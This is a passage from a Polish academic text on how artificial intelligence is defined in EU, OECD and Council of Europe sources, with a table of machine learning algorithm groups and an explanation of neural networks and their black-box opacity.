środowiska, z którymi wchodzi w interakcję” Wspomniane w definicji techniki i
podejścia to:
• mechanizmy uczenia maszynowego, w tym uczenie nadzorowane,
uczenie się maszyn bez nadzoru i uczenie przez wzmacnianie, z wykorzystaniem
szerokiej gamy metod, w tym uczenia głębokiego;
• metody oparte na logice i wiedzy, w tym reprezentacja wiedzy,
indukcyjne programowanie (logiczne), bazy wiedzy, silniki inferencyjne i
dedukcyjne, rozumowanie (symboliczne) i systemy ekspertowe;
• podejścia statystyczne, estymacja bayesowska, metody wyszukiwania i
optymalizacji.
Jak widać, sposób zdefiniowania sztucznej inteligencji w tym, z założenia
podstawowym dotyczącym AI akcie prawnym UE, jest dość skomplikowany.
Aktualnie trwają prace nad projektem ustawy o sztucznej inteligencji, które ze
względów rozbieżności regulacyjnych przeciągają się w czasie. 14 czerwca 2023
r. Parlament Europejski przyjął stanowisko negocjacyjne w sprawie aktu o
sztucznej inteligencji
21
, a 9 grudnia 2023 r. osiągnął wstępne porozumienie z Radą
w sprawie aktu o sztucznej inteligencji. Uzgodniony tekst będzie teraz musiał
zostać formalnie przyjęty zarówno przez Parlament, jak i Radę, aby stał się
prawem UE
22
. Z kolei Organizacja Współpracy Gospodarczej i Rozwoju sztuczną
inteligencję definiuje jako „system maszynowy, który może, dla danego zestawu
celów zdefiniowanych przez człowieka, przewidywać, rekomendować lub
podejmować decyzje wpływające na rzeczywiste lub wirtualne środowiska.
Systemy AI są zaprojektowane do działania z różnymi poziomami autonomii”
23
.
Ciekawą definicję znajdziemy na internetowej stronie Rady Europy, w zakładce
poświęconej sztucznej inteligencji, gdzie w słowniczku sztuczna inteligencja to
„zespół nauk, teorii i technik, których celem jest odtworzenie przez maszynę
21
Regulacje ws. sztucznej inteligencji: oczekiwania Parlamentu, Parlament Europejski, Aktualności
– Priorytety, ostatnia aktualizacja: 20-06-2023,
https://www.europarl.europa.eu/news/pl/headlines/priorities/sztuczna-inteligencja-w-
ue/20201015STO89417/regulacje-ws-sztucznej-inteligencji-oczekiwania-parlamentu. Por. także: Akt
ws. sztucznej inteligencji: pierwsze przepisy regulujące sztuczną inteligencję,, Parlament Europejski,
Aktualności - Społeczeństwo, 13-06-2023,
https://www.europarl.europa.eu/news/pl/headlines/society/20230601STO93804/akt-ws-sztucznej-
inteligencji-pierwsze-przepisy-regulujace-ai
22
Komisja Europejska ,Artificial Intelligence Act: deal on comprehensive rules for trustworthy AI,
https://www.europarl.europa.eu/news/pl/press-room/20231206IPR15699/artificial-intelligence-act-
deal-on-comprehensive-rules-for-trustworthy-ai; por. także Parlament Europejski, Akt ws. Sztucznej
inteligencji: pierwsze przepisy regulujące sztuczną inteligencję, ostatnia aktualizacja: 19-12-2023,
https://www.europarl.europa.eu/topics/pl/article/20230601STO93804/akt-ws-sztucznej-inteligencji-
pierwsze-przepisy-regulujace-ai
23
Zalecenie w sprawie sztucznej inteligencji (AI) zostało przyjęte przez Radę OECD na szczeblu
ministerialnym w dniu 22 maja 2019 r. na wniosek Komitetu ds. Polityki Gospodarki Cyfrowej
(CDEP). Zalecenie Rady w sprawie Sztucznej Inteligencji OECD/LEGAL/0449,
https://legalinstruments.oecd.org/en/instruments/OECD-LEGAL-0449
253
zdolności poznawczych człowieka. Obecne osiągnięcia mają na celu na przykład
możliwość powierzenia maszynie złożonych zadań, które wcześniej zostały
przekazane człowiekowi”
24
.
Punktem wyjścia do zdefiniowania sztucznej inteligencji powinno być
określenie co składa się na nią lub gdzie ona jest implementowana, w jaki sposób
zdobywa wiedzę, jaki jest stopień jej autonomiczności i w jaki sposób wchodzi w
interakcje z otoczeniem. Jednocześnie zdefiniowanie tego czym jest sztuczna
inteligencja w ogromnym stopniu determinuje bieżący, dla momentu powstawania
definicji, stan rozwoju technologicznego i tempo zmian w elektronice,
informatyce i komunikacji. Już uczestnicy konferencji z 1955 r. w Dartmouth
College zwracali uwagę na to, że pojemność i funkcjonalność elektroniki rośnie
wykładniczo, podwajając się co 18 miesięcy
25
. Również Stuart Russell i Peter
Norvig uwypuklają to w swoim sztandarowym dziele „Artificial Intelligence: A
Modern Approach”
26
. Reasumując sztuczną inteligencję definiuję jako maszynę,
czyli sztuczny, złożony cybernetyczny system komputer-oprogramowanie-
osprzęt, o architekturze poznawczo-funkcjonalnej i własnej lub odpowiednio
dostępnej (przyłączonej) mocy obliczeniowej o wymaganych pojemnościach i
szybkości
27
, pozwalający na wykonywanie zachowań wymagających procesu
uczenia się i uwzględniania nowych okoliczności w toku rozwiązywania
danego problemu i który może w różnym stopniu – w zależności od
konfiguracji – działać autonomicznie oraz wchodzić w interakcje z
otoczeniem (podkreślenie autora). Maszyna będąca sztuczną inteligencją jest
systemem informatycznym z logiką operacyjną (modele algorytmów) oraz
aparatem wykonawczym, które łączą spójne relacje. Oczywiście ich szczegółowa
budowa, skład i zadania będą uzależnione od planowanego wykorzystania AI.
Znajdujące się w wielu publikacjach, szczególnie popularno-naukowych,
stwierdzenia, że maszynę można uznać za sztuczną inteligencję, jeśli spełni Test
24
https://www.coe.int/en/web/artificial-intelligence/home Por, także Przegląd Rady Europy:
Działania związane ze sztuczną inteligencją, marzec 2023, https://rm.coe.int/brochure-artificial-
intelligence-en-march-2023-print/1680aab8e6
25
McCarthy J., Minsky M., Rochester N., Shannon C., A Proposal for the Dartmouth Summer
Research Project on Artificial Intelligence, August 31 1955, AI Magazine 2006, Vol. 27(4), s. 12-14,
https://doi.org/10.1609/aimag.v27i4.1904
26
Por. Russell S., Norvig P., Artificial Intelligence: A Modern Approach, Global Edition, Pearson
Education Limited 2021, s. 17-26; polskie wydanie: Russell S., Norvig P., Sztuczna inteligencja.
Nowe spojrzenie Wydanie IV, Tom 1, Helion 2023, s. 35-45
27
Margaret A. Boden stwierdza: „chociaż sztuczna inteligencja potrzebuje maszyn fizycznych (czyli
komputerów) to najlepiej jest myśleć o niej w kontekście korzystania z tego, co informatycy
nazywają maszynami wirtualnymi. /…/Maszyna wirtualna jest emulacją pewnego systemu w celu
wykonania w nim procesów dokładnie w taki sam sposób, jak w oryginalnym fizycznym systemie” -
Boden M.A., Sztuczna inteligencja, Wyd. Uniwersytetu Łódzkiego 2020, s. 15-16
254
Turinga
28
lub jego odmiany - Odwrócony test Turinga
29
lub Całkowity test
Turinga Stevena Harnada
30
,należy uznać za błędny kierunek, bowiem w teście
Turinga niejawnie zakłada się, że zidentyfikowanie inteligencji wymaga
inteligencji (sędziów oceniających) i powinien być traktowany wyłącznie jako
sposób zbadania idei myślenia maszynowego i jego znaczenia
31
.
Podstawowym elementem sztucznej inteligencji są algorytmy
32
, czyli opis
kolejnych kroków potrzebnych do poprawnego rozwiązania problemu (zadania).
W swojej najbardziej podstawowej postaci algorytm jest po prostu
sprecyzowanym zestawem instrukcji do rozwiązania problemu. Instrukcje mogą
dotyczyć komputera cyfrowego, ale niekoniecznie - przepis na grochówkę z
książki 'Kuchnia Polska' a nawet zestaw instrukcji obsługi domowej zmywarki, to
algorytmy. Najbardziej precyzyjnymi sposobem zapisu listy instrukcji algorytmu
dla komputera jest kod źródłowy programu komputerowego, zapisany w
konkretnym języku programowania. Dziesięć najpopularniejszych języków
programowania służących do pisania instrukcji nauki systemów AI, wg ankiety z
2019 r. portalu GitHub, to: Python, C++, JavaScript, Java, C#, Julia, Shell, R,
TypeScript i Scala – wykorzystywany do pracy z dużymi zbiorami danych
33
.
Harari Yuval Noah stwierdza „Algorytm nie jest jakimś konkretnym obliczeniem,
lecz metodą, którą się stosuje podczas dokonywania jakiegoś obliczenia”
34
.
Klasyczne algorytmy opisują konkretną sekwencje następujących po sobie
instrukcji. Używane w AI algorytmy uczące tworzą model zawierający jedynie
listę instrukcji do wykonania na podstawie analizy przekazanych im danych
uczących. Różnią się od zwykłego algorytmu tym, że w wyniku ich działania
powstają nowe reguły. Nick Bostrom konstatuje „Algorytmy różnią się, gdy idzie
28
Test Turinga to metoda w sztucznej inteligencji służąca do identyfikacji atrybucji sztucznej
inteligencji w maszynie w określonych okolicznościach, sposób sprawdzenia zdolności komputera
do odpowiedzi w porównaniu z ludźmi. Test wymaga trzech uczestników, w tym dwóch ludzi i
komputera. Według Turinga badanie można było przeprowadzić w pokoju przesłuchań pod nadzorem
sędziego. Sędzia powinien przeprowadzić rozmowę z obiema stronami, nie widząc ich, gdzie sędzia
przesłuchuje uczestników (komputer i człowiek), a oni odpowiadają. Nowa wersja testu Turinga
stwierdza, że do przesłuchania obu uczestników powinien być więcej niż jeden ludzki sędzia. Jeśli po
pięciominutowych rozmowach ponad 30% sędziów stwierdzi, że komputer wykazał ludzką
inteligencję i komputer może myśleć jak ludzie. Nowe zasady testu wprowadził Hugh Loebner,
amerykański wynalazca i aktywista. Według niego komputer i ludzie muszą odbyć 25-minutową
rozmowę z każdym z czterech sędziów.
29
W zwykłym teście Turinga obaj uczestnicy próbują działać jak ludzie, podczas gdy w
odwróconym teście Turinga obaj uczestnicy próbują działać jak komputery lub mieć inteligencję
maszynową. Jeśli człowiek przejdzie odwrócony test Turinga, oznacza to, że najlepiej zna komputer.
Programiści lub hakerzy zazwyczaj uczestniczą w odwróconym teście Turinga.
30
W całkowitym teście Turinga przesłuchujący może ocenić zdolności percepcyjne komputera
(zdolność interpretowania czegoś za pomocą zmysłów) poprzez wizję komputera i zdolność do
manipulowania przedmiotami, takimi jak robotyka.
31
Walsh T., To żyje! Sztuczna inteligencja od logicznego fortepianu po zabójcze roboty, PWN
Warszawa 2018, s. 62 i 54-69
32
Szerzej o algorytmach - Heineman G., Nauka algorytmów. Poradnik pisania lepszego kodu,
Helion Gliwice 2022
33
Czym jest machine learning?, Trend Micro, https://www.trendmicro.com/pl_pl/what-is/machine-
learning.html
34
Harari Y.N., Homo deus. Krótka historia jutra, Wydawnictwo Literackie Kraków 2018, s. 42
255
o wymaganą pamięć i moc obliczeniową, przyjmowane z góry ukierunkowanie
indukcyjne, łatwość włączenia treści z zewnątrz oraz przejrzystości mechanizmów
ich działania dla analizującego je człowieka”
35
. Jason Brownlee w swoim
"Przewodniku po algorytmach uczenia maszynowego”
36
przedstawia dwie
metody grupowania algorytmów do uczenia maszynowego. Pierwsza to
grupowanie algorytmów według ich stylu uczenia się, czyli algorytmy
nadzorowane, nienadzorowane i częściowo nadzorowane. Druga, znacznie
ciekawsza, metoda to grupowanie algorytmów według ich podobieństwa w formie
lub funkcji (jak grupowanie podobnych zwierząt). W swoim podręczniku
prezentuje 64 algorytmy zgrupowane w jedenastu grupach - por. tabela nr 1.
35
Bostrom, N., Superinteligencja. Scenariusze, strategie, zagrożenia, Wydawnictwo Helion Gliwice
2021, s. 28-29
36
Brownlee J., A Tour of Machine Learning Algorithms, August 12, 2019,
https://machinelearningmastery.com/a-tour-of-machine-learning-algorithms/ ; szerzej – Brownlee J.,
Master Machine Learning Algorithms (e-book), 2021,
256
Tabela 1. Algorytmy uczenia maszynowego według podobieństwa pod względem funkcji wg J. Brownlee
Nazwa grupy
algorytmów/
angielska
wersja nazwy
Opis
Najpopularniejsze algorytmy
Angielska wersja nazwy
Algorytmy
regresji /
Regression
Algorithms
Regresja dotyczy modelowania relacji między
zmiennymi, które jest iteracyjnie udoskonalane
przy użyciu miary błędu w przewidywaniach
dokonanych przez model. Metody regresji są
koniem pociągowym statystyk i zostały
dokooptowane do statystycznego uczenia
maszynowego. Może to być mylące, ponieważ
możemy użyć regresji w odniesieniu do klasy
problemu i klasy algorytmu. Naprawdę, regresja to
proces.
• Regresja zwykłych
najmniejszych kwadratów
(OLSR)
• Regresja liniowa
• Regresja logistyczna
• Regresja krokowa
• Wielowymiarowe krzywe
regresji adaptacyjnej (MARS)
• Lokalnie szacowane
wygładzanie wykresu
rozrzutu (LOESS)
• Ordinary Least Squares
Regression (OLSR)
• Linear Regression
• Logistic Regression
• Stepwise Regression
• Multivariate Adaptive
Regression Splines (MARS)
• Locally Estimated Scatterplot
Smoothing (LOESS)
Algorytmy
oparte na
instancjach /
Instance-based
Algorithms
Model uczenia się oparty na instancjach to
problem decyzyjny z instancjami lub przykładami
danych uczących, które są uważane za ważne lub
wymagane dla modelu. Takie metody zazwyczaj
tworzą bazę danych przykładowych danych i
porównują nowe dane z bazą danych przy użyciu
miary podobieństwa w celu znalezienia
najlepszego dopasowania i dokonania prognozy. Z
tego powodu metody oparte na instancjach są
również nazywane metodami „zwycięzca bierze
wszystko” i uczeniem się opartym na pamięci.
Nacisk kładziony jest na reprezentację
przechowywanych instancji i miary podobieństwa
stosowane między instancjami
• k-Najbliższy sąsiad (kNN)
• Nauka kwantyzacji
wektorowej (LVQ)
• Mapa samoorganizująca się
(SOM)
• Nauka ważona lokalnie
(LWL)
• Maszyny wektorów nośnych
(SVM)
• k-Nearest Neighbor (kNN)
• Learning Vector Quantization
(LVQ)
• Self-Organizing Map (SOM)
• Locally Weighted Learning
(LWL)
• Support Vector Machines
(SVM)
257
Nazwa grupy
algorytmów/
angielska
wersja nazwy
Opis
Najpopularniejsze algorytmy
Angielska wersja nazwy
Algorytmy
regularyzacji /
Regularization
Algorithms
Rozszerzenie wprowadzone do innej metody
(zazwyczaj metod regresji), która karze modele w
oparciu o ich złożoność, faworyzując prostsze
modele, które są również lepsze w uogólnianiu.
• Regresja grzbietowa
• Operator najmniejszego
skurczu i wyboru (LASSO)
• Elastyczna siatka
• Regresja najmniejszego kąta
(LARS)
• Ridge Regression
• Least Absolute Shrinkage and
Selection Operator (LASSO)
• Elastic Net
• Least-Angle Regression
(LARS)
Algorytmy
drzew
decyzyjnych /
Decision Tree
Algorithms
Metody drzew decyzyjnych budują model decyzji
podejmowanych na podstawie rzeczywistych
wartości atrybutów w danych.
Decyzje rozwidlają się w strukturach
drzewiastych, dopóki nie zostanie podjęta decyzja
predykcyjna dla danego rekordu. Drzewa
decyzyjne są szkolone na danych dotyczących
problemów klasyfikacji i regresji. Drzewa
decyzyjne są często szybkie i dokładne oraz są
bardzo popularne w uczeniu maszynowym.
• Drzewo Klasyfikacji i
Regresji (CART)
• Iteracyjny dychotomizer 3
(ID3)
• C4.5 i C5.0 (różne wersje
potężnego podejścia)
• Automatyczne wykrywanie
interakcji chi-kwadrat
(CHAID)
• Kikut decyzji
• M5
• Warunkowe drzewa decyzyjne
• Classification and Regression
Tree (CART)
• Iterative Dichotomiser 3 (ID3)
• C4.5 and C5.0 (different
versions of a powerful
approach)
• Chi-squared Automatic
Interaction Detection (CHAID)
• Decision Stump
• M5
• Conditional Decision Trees
Algorytmy
Bayesowskie /
Bayesian
Algorithms
Metody bayesowskie to te, które wyraźnie stosują
twierdzenie Bayesa do problemów takich jak
klasyfikacja i regresja.
• Naiwny Bayes
• Gaussowski naiwny Bayes
• Bayes wielomianowy naiwny
• Uśrednione estymatory
jednozależnościowe (AODE)
• Bayesowska Sieć Wierzeń
(BBN)
• Sieć Bayesowska (BN)
• Naive Bayes
• Gaussian Naive Bayes
• Multinomial Naive Bayes
• Averaged One-Dependence
Estimators (AODE)
• Bayesian Belief Network (BBN)
• Bayesian Network (BN)
258
Nazwa grupy
algorytmów/
angielska
wersja nazwy
Opis
Najpopularniejsze algorytmy
Angielska wersja nazwy
Algorytmy
klastrowania /
Clustering
Algorithms
Klastrowanie, podobnie jak regresja, opisuje klasę
problemu i klasę metod.
Metody grupowania są zazwyczaj zorganizowane
według metod modelowania, takich jak centroidy
i hierarchiczne. Wszystkie metody dotyczą
wykorzystania nieodłącznych struktur danych, aby
jak najlepiej zorganizować dane w grupy o
maksymalnej wspólnocie.
• k-średnie
• k-mediany
• Maksymalizacja oczekiwań
(EM)
• Klastrowanie hierarchiczne
• k-Means
• k-Medians
• Expectation Maximisation (EM)
• Hierarchical Clustering
Algorytmy
uczenia się reguł
stowarzyszenia /
Association
Rule Learning
Algorithms
Metody uczenia reguł asocjacyjnych
wyodrębniają reguły, które najlepiej wyjaśniają
obserwowane relacje między zmiennymi w
danych.
Reguły te mogą wykrywać ważne i przydatne
komercyjnie asocjacje w dużych,
wielowymiarowych zestawach danych, które
mogą być wykorzystywane przez organizację.
• Algorytm apriori
• Algorytm odłamków
• Apriori algorithm
• Eclat algorithm
Algorytmy
sztucznych sieci
neuronowych /
Artificial Neural
Network
Algorithms
Sztuczne sieci neuronowe to modele inspirowane
strukturą i/lub funkcją biologicznych sieci
neuronowych.
Są klasą dopasowywania wzorców, które są
powszechnie używane w problemach regresji i
klasyfikacji, ale w rzeczywistości są ogromną
poddziedziną składającą się z setek algorytmów i
odmian dla wszystkich rodzajów problemów.
• Perceptron
• Perceptrony wielowarstwowe
(MLP)
• Propagacja wsteczna
• Stochastyczne zejście
gradientowe
• Sieć Hopfield
• Radialna Sieć Funkcji
Bazowych (RBFN)
• Perceptron
• Multilayer Perceptrons (MLP)
• Back-Propagation
• Stochastic Gradient Descent
• Hopfield Network
• Radial Basis Function Network
(RBFN)
Algorytmy
głębokiego
uczenia / Deep
Metody głębokiego uczenia to nowoczesna
aktualizacja sztucznych sieci neuronowych, które
wykorzystują obfite tanie obliczenia.
• Konwolucyjna sieć
neuronowa (CNN)
• Rekurencyjne sieci
neuronowe (RNN)
• Convolutional Neural Network
(CNN)
• Recurrent Neural Networks
(RNNs)
259
Nazwa grupy
algorytmów/
angielska
wersja nazwy
Opis
Najpopularniejsze algorytmy
Angielska wersja nazwy
Learning
Algorithms
Zajmują się one budowaniem znacznie większych
i bardziej złożonych sieci neuronowych i wiele
metod dotyczy bardzo dużych zbiorów danych
oznaczonych danych analogowych, takich jak
obraz, tekst. dźwięk i wideo.
• Sieci pamięci krótkotrwałej
(LSTM)
• Autokodery ułożone w stos
• Głęboka maszyna Boltzmanna
(DBM)
• Sieci głębokich przekonań
(DBN)
• Long Short-Term Memory
Networks (LSTMs)
• Stacked Auto-Encoders
• Deep Boltzmann Machine
(DBM)
• Deep Belief Networks (DBN)
Algorytmy
redukcji
wymiarowości /
Dimensionality
Reduction
Algorithms
Podobnie jak metody grupowania, redukcja
wymiarowości poszukuje i wykorzystuje
nieodłączną strukturę danych, ale w tym
przypadku w sposób nienadzorowany lub w celu
podsumowania lub opisania danych przy użyciu
mniejszej ilości informacji.
Może to być przydatne do wizualizacji danych
wymiarowych lub uproszczenia danych, które
można następnie wykorzystać w nadzorowanej
metodzie uczenia się. Wiele z tych metod można
dostosować do użytku w klasyfikacji i regresji.
• Analiza głównych
składowych (PCA)
• Regresja głównych
składowych (PCR)
• Regresja częściowych
najmniejszych kwadratów
(PLSR)
• Mapowanie Sammona
• Skalowanie wielowymiarowe
(MDS)
• Pogoń za projekcją
• Liniowa analiza
dyskryminacyjna (LDA)
• Analiza dyskryminacyjna
mieszanin (MDA)
• Kwadratowa analiza
dyskryminacyjna (QDA)
• Elastyczna analiza
dyskryminacyjna (FDA)
• Principal Component Analysis
(PCA)
• Principal Component
Regression (PCR)
• Partial Least Squares
Regression (PLSR)
• Sammon Mapping
• Multidimensional Scaling
(MDS)
• Projection Pursuit
• Linear Discriminant Analysis
(LDA)
• Mixture Discriminant Analysis
(MDA)
• Quadratic Discriminant
Analysis (QDA)
• Flexible Discriminant Analysis
(FDA)
Algorytmy
zespołowe /
Metody zespołowe to modele składające się z
wielu słabszych modeli, które są niezależnie
• Wzmacnianie (Boosting)
• Agregacja Bootstrapped
(pakowanie)
• Boosting
• Bootstrapped Aggregation
(Bagging)
260
Nazwa grupy
algorytmów/
angielska
wersja nazwy
Opis
Najpopularniejsze algorytmy
Angielska wersja nazwy
Ensemble
Algorithms
trenowane i których prognozy są w pewien sposób
łączone w celu uzyskania ogólnej prognozy.
Wiele wysiłku wkłada się w to, jakie typy słabych
uczniów należy połączyć i jak ich łączyć. Jest to
bardzo potężna klasa technik i jako taka jest
bardzo popularna
• AdaBoost
• Średnia ważona (mieszanie)
• Generalizacja skumulowana
(układanie)
• Gradient Boosting Machines
(GBM)
• Drzewa regresji wzmocnionej
gradientem (GBRT)
• Losowy Las
• AdaBoost
• Weighted Average (Blending)
• Stacked Generalization
(Stacking)
• Gradient Boosting Machines
(GBM)
• Gradient Boosted Regression
Trees (GBRT)
• Random Forest
Źródło: Opracowanie własne na podstawie Brownlee J., A Tour of Machine Learning Algorithms, https://machinelearningmastery.com/a-tour-of-machine-
learning-algorithms/
Algorytmy uczenia maszynowego pracują na danych, które dla nich są
najważniejsze. Dane są faktami na temat rzeczy, dlatego w ich zapisie nie występuje
tendencyjność. Jednak w rzeczywistym świecie dane są zbierane, rejestrowane i łączone
przez ludzi w określonym kontekście i na podstawie ustalonego wyobrażenia o
możliwościach ich wykorzystania. W wyniku wyciągania na tej podstawie sensownych
wniosków w celu uzyskania odpowiedzi na pytania powstaje informacja. Uczenie
maszynowe jest rodzajem uczenia, które wykorzystuje algorytmy, techniki statystyczne i
modelowanie do wykonania zadania. Elementem odróżniającym system sztucznej
inteligencji od klasycznych zero-jedynkowych systemów sterowania jest perspektywa:
(1) umożliwienia systemowi AI stopniowego uczenia się na podstawie danych, przy
użyciu różnych opisujących je algorytmów oraz
(2) przewidywania wyników poprzez naukę na podstawie danych szkoleniowych
stanowiących bazę precyzyjnych modeli.
Proces tworzenia wiedzy o rozwiązaniu nazywamy uczeniem, a w wyniku realizacji tego
procesu budujemy model danych. Użyte dane mogą być:
• ustrukturyzowane, czyli powiązane relacjami np. z relacyjnej bazy danych,
• półstrukturalne, najczęściej o płaskiej reprezentacji w formie tabeli,
• nieustrukturyzowane, do których zalicza się dane multimedialne, takie jak wideo,
zdjęcia, dźwięk, strony internetowe, dokumenty tekstowe, e-maile, a także dane
otrzymane z systemów IoT.
Uczenie maszynowe (Machine Learning - ML) należy do najważniejszych
działów sztucznej inteligencji i ma także bezpośrednie odniesienie do dwóch innych
głównych działów sztucznej inteligencji - automatycznego wnioskowania i
przeszukiwania heurystycznego. Uczenie maszynowe jest aplikacją AI, która stanowi
proces i wykorzystuje matematyczne modele danych do udzielenia pomocy systemowi w
nauce konkretnych działań bez bezpośrednich instrukcji. Co więcej w uczeniu
maszynowym tak samo ważnymi, a niekiedy bardziej istotnymi, elementami jak
algorytmy są kontekst danych, przygotowanie danych i zadawane pytania. Dzięki temu
system może uczyć się oraz udoskonalać samodzielnie, jedynie w oparciu o nabywane
doświadczenie. Uczenie maszynowe polega na uczeniu komputerów, aby wykonywały
zadania zgodnie z wzorcami statystycznymi i wnioskami, a nie zgodnie z instrukcjami
logicznymi zakodowanymi przez człowieka. Proces uczenia maszynowego (ang. learning
process) bazuje na następujących krokach:
1/ wprowadzenie źródła danych do algorytmu,
2/ użycie tych danych do uzyskania rezultatu,
3/ porównanie rezultatu z danymi kontrolnymi,
4/ zapamiętanie rezultatów i użycie ich do kolejnej iteracji związanej z
przetwarzaniem wprowadzonego zbioru danych.
W ten sposób tworzy się sprzężenie zwrotne, które w kolejnych powtórzeniach
ukierunkowuje algorytm na odniesienie sukcesu (czyli znalezienia prawidłowego lub
najbliższego prawdzie wyniku) związanego z analizą wprowadzonych danych. Językiem
sztucznej inteligencji jest matematyka: jeśli problemu nie można sformułować
matematycznie, nie jest on odpowiedni dla sztucznej inteligencji
1
. Mówiąc dokładniej,
nie możemy używać sztucznej inteligencji, jeśli nie możemy podać ilościowego opisu
tego, co chcemy zoptymalizować. W uczeniu maszynowym algorytm uczy się mapować
zestaw danych wejściowych na dane wyjściowe. Mapa nauczona przez algorytm uczenia
1
Por. Patterson J., Gibson A., Deep Learning. Praktyczne wprowadzenie, Helion Gliwice 2018, s. 25-37
262
maszynowego nazywana jest modelem. Uogólniając, uczenie maszynowe opiera się na
algorytmach wyodrębniania informacji z surowych danych i reprezentowania ich w
formie określonego modelu. Model ten jest następnie wykorzystywany do przetwarzania
kolejnych wcześniej niemodelowanych danych. Inaczej to określając, proces polega na
wykorzystaniu algorytmu uczącego i przekazania mu danych uczących w celu utworzenia
modelu. Wykładniczy rozwój technologiczny w elektronice, zwłaszcza w zakresie
dostępu do mocy obliczeniowych, spowodował, iż jedną z procedur wykorzystywanych
do uczenia komputera imitowania zachowań i rozumowania człowieka stały się sieci
neuronowe, które dominują w dziedzinie uczenia się reprezentacji
2
. Są to sekwencje
algorytmów, które zostały stworzone na podstawie sposobu funkcjonowania ludzkiego
mózgu. Wyróżniającą cechą sieci neuronowej jako narzędzia informatycznego jest
możliwość komputerowego rozwiązywania, przy jej pomocy, praktycznych problemów
bez ich uprzedniej matematycznej formalizacji. Dalszą zaletą jest brak konieczności
odwoływania się przy stosowaniu sieci do jakichkolwiek teoretycznych założeń na temat
rozwiązywanego problemu
3
. W przypadku sieci neuronowej mamy do czynienia ze
znacznie sprawniejszym procesem pozyskiwania wiedzy. Zamiast „ręcznego”
wyprowadzania reguł wykonywana jest operacja trenowania sieci neuronowej na
podstawie właściwie dobranych przykładów. Zanim zostanie uruchomiony proces
uczenia należy określić, jak sieć ma wyglądać, z ilu ma być zbudowana neuronów i jak
połączonych. Następnie należy wprowadzić przykład, czyli dane wejściowe X oraz
spodziewane dane wyjściowe Y. Sieć musi tak się dostroić (zmieniać wartość wag
4
połączeń), aby odpowiedzieć w sposób, jaki zakłada przykład. Po serii przykładów siec
nauczy się i będzie w stanie generować odpowiedzi na dotąd nieznane dane wejściowe.
Dodatkowo sieci neuronowe zwykle posiadają algorytm samouczenia, czyli metodę
całkowicie samodzielnego dostosowywania się sieci neuronowej do analizy danych
pojawiających się na jej wejściu bez żadnego komentarza ani wyjaśnienia. Sieć
samoucząca potrafi takie dane automatycznie porządkować, dzielić na grupy,
identyfikować i kategoryzować. Należy podkreślić, że w odróżnieniu od uczenia, kiedy
sieć wyłącznie pozyskuje wiedzę pochodzącą od nauczyciela – przy samouczeniu musi
ona tę wiedzę niejako sama odkrywać, co stwarza zupełnie nowe możliwości zastosowań.
Jak podkreślają Ryszard Tadeusiewicz i Maciej Szaleniec „wadą samouczenia jest to, że
sieć wprawdzie całkiem sama zdobywa wiedzę (czy może nawet samodzielnie ją tworzy)
– ale użytkownik nie ma żadnego wpływu na to, w jakiej formie ta wiedza jest
przedstawiona na wyjściu sieci. W związku z tym interpretacja wyników samouczenia oraz
rozwiązań dostarczanych przez wytrenowaną samouczącą się sieć w trakcie egzaminu
wymaga pewnego wysiłku. Użytkownik musi najpierw zrozumieć, co sieć sygnalizuje i w
2
Uczenie się reprezentacji to dziedzina uczenia maszynowego, w której modele konstruuje się tak, aby
automatycznie uczyły się cech, czyli reprezentacji. Tak wyuczone cechy są lepsze i bardziej uniwersalne niż
ich zdefiniowane przez człowieka odpowiedniki. Efekt uboczny jest taki, że wyuczone cechy mogą nie być
tak oczywiste i proste do wyjaśnienia - Krohn J., Beyleveld G., Bassens A., Głębokie uczenie i sztuczna
inteligencja. Interaktywny przewodnik ilustrowany, Helion Gliwice 2022, s. 21-37
3
Tadeusiewicz R., Szaleniec M., Leksykon sieci neuronowych, Wydawnictwo Fundacji „Projekt Nauka”
Wrocław 2015, s. 94
4
Wagi - parametry neuronu decydujące o jego właściwościach i roli w procesie rozwiązywania przez sieć
postawionego zadania. Zwykle wagi dopasowuje w całej sieci używany algorytm uczenia lub samouczenia.
Komplet wartości wag ustalonych we wszystkich neuronach w trakcie uczenia lub samouczenia determinuje
wiedzę, jaką posiada sieć neuronowa. - Tadeusiewicz R., Szaleniec M., Leksykon …,op.cit,, s. 110
263
jaki sposób – a dopiero potem może odnosić korzyści z samouczącej się sieci”
5
. Sztuczne
sieci neuronowe tworzą powiązania, wyszukują relacje, odkrywają wzorce, tworzą nowe
przykłady itd. na podstawie dobrze zdefiniowanych zestawów danych. Niestety, czasami
przyjmowane założenia lub nakładane warunki nie są wyraźnie sprecyzowane, a
długotrwały proces uczenia może zakończyć się całkowitym niepowodzeniem
weryfikacji
6
. Sztuczne sieci neuronowe są złożonymi strukturami matematycznymi,
które składają się z wielu warstw neuronów, połączonych ze sobą za pomocą wag.
Podczas procesu uczenia sieć dostosowuje te wagi na podstawie dostarczonych danych
treningowych, aby nauczyć się rozpoznawania wzorców lub wykonywania określonych
zadań. Jednakże, ze względu na swoją złożoność i dużą liczbę parametrów, klasyczne
sieci neuronowe są trudne do interpretacji przez człowieka. Możemy zobaczyć wejścia i
wyjścia sieci oraz wyniki, które generuje, ale nie jesteśmy w stanie dokładnie zrozumieć,
jakie cechy danych czy jakie wewnętrzne przetwarzanie prowadzą do tych wyników
7
.
Nie możemy łatwo wytłumaczyć, dlaczego sieć podjęła określone decyzje lub jak doszła
do konkretnych wniosków
8
. Ciekawe– z punktu widzenia kryminologa - są próby
„otworzenia” algorytmów, określanych mianem „czarnych skrzynek” ze względu na ich
hermetyczność, w ten sposób skomentowane przez Davida Sumptera: „Wprowadzasz
swoje dane, czekasz, aż model przetworzy je i otrzymujesz odpowiedź. Nie widzisz, co się
dzieje we wnętrzu. (…) Obrazy z czarnych skrzynek mogą wywołać w nas uczucie
bezradności, poczucie, że nie wiemy, co algorytmy robią z naszymi danymi”
9
. Uczenie
maszynowe sieci neuronowych, z uwagi na dużych ilości danych, jaką ta neuronowa sieć
wielowarstwowa może przerobić, nazywa się uczeniem głębokim (Deep learning)
10
.
Trening z dużą ilością danych konfiguruje sieć neuronową. Wynikiem takiego treningu
jest model uczenia głębokiego, który po przeszkoleniu przetwarza nowe dane. Modele
5
Tadeusiewicz R., Szaleniec M., Leksykon…, op.cit.., s. 16
6
Bonaccorso G., Algorytmy uczenia maszynowego. Zaawansowane techniki implementacji, Helion Gliwice
2019, s. 20
7
Klasycznym problemem sztucznej sieci neuronowej jest to, że działa on jako tzw. czarna skrzynka (black
box). Oznacza to, że dla podanych danych zwraca on wyniki najbliższe prawdziwym, ale często nie potrafimy
wytłumaczyć logiki wybranego rozwiązania, gdyż nie są dokładnie określone liczne (zazwyczaj) parametry
